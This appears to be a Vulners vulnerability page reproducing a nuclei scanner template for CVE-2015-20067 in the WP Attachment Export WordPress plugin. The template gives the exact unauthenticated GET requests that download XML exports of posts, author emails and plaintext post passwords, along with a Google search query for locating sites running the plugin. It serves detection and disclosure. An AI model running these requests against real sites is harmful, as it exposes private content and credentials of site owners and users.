Lucene search
K

WP Attachment Export < 0.2.4 - Unrestricted File Download

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 48 Views

WP Attachment Export < 0.2.4 - Unrestricted File Download allows unauthenticated users to download XML data containing details of all attachments/posts on a WordPress site, including private and password protected posts with passwords in plain text

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress 安全漏洞
1 Nov 202100:00
cnnvd
CVE
CVE-2015-20067
1 Nov 202108:45
cve
Cvelist
CVE-2015-20067 WP Attachment Export < 0.2.4 - Unauthenticated Posts Download
1 Nov 202108:45
cvelist
NVD
CVE-2015-20067
1 Nov 202109:15
nvd
Patchstack
WordPress WP Attachment Export plugin <= 0.2.3 - Unauthenticated Posts Download vulnerability
15 Aug 201500:00
patchstack
Prion
Design/Logic Flaw
1 Nov 202109:15
prion
RedhatCVE
CVE-2015-20067
22 May 202509:28
redhatcve
id: CVE-2015-20067

info:
  name: WP Attachment Export < 0.2.4 - Unrestricted File Download
  author: r3Y3r53
  severity: high
  description: |
    The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress
    powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
  impact: |
    Unauthenticated attackers can download XML files containing sensitive attachment and post metadata including titles, author IDs, email addresses, and plaintext passwords for password-protected posts, potentially exposing confidential information and credentials from the WordPress site.
  remediation: |
    Fixed in 0.2.4
  reference:
    - https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a
    - https://packetstormsecurity.com/files/132693/
    - https://seclists.org/fulldisclosure/2015/Jul/73
    - https://nvd.nist.gov/vuln/detail/CVE-2015-20067
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-20067
    cwe-id: CWE-862
    epss-score: 0.08185
    epss-percentile: 0.94148
    cpe: cpe:2.3:a:wp_attachment_export_project:wp_attachment_export:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wp_attachment_export_project
    product: wp_attachment_export
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/wp-attachment-export/"
  tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wp_attachment_export_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true"
      - "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/xml")'
          - 'contains_all(body, "title","wp:author_id","wp:author_email")'
        condition: and
# digest: 4a0a00473045022100c0e1d5d7d20c9b575453710631cfa491a961e2a7bda708c171d18b0e821a7fda02201d27f22c7b38807f9fa2908103b7e2ac24e53916df7b8ef340a39f176c380140:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
CVSS 3.17.5
EPSS0.08185
48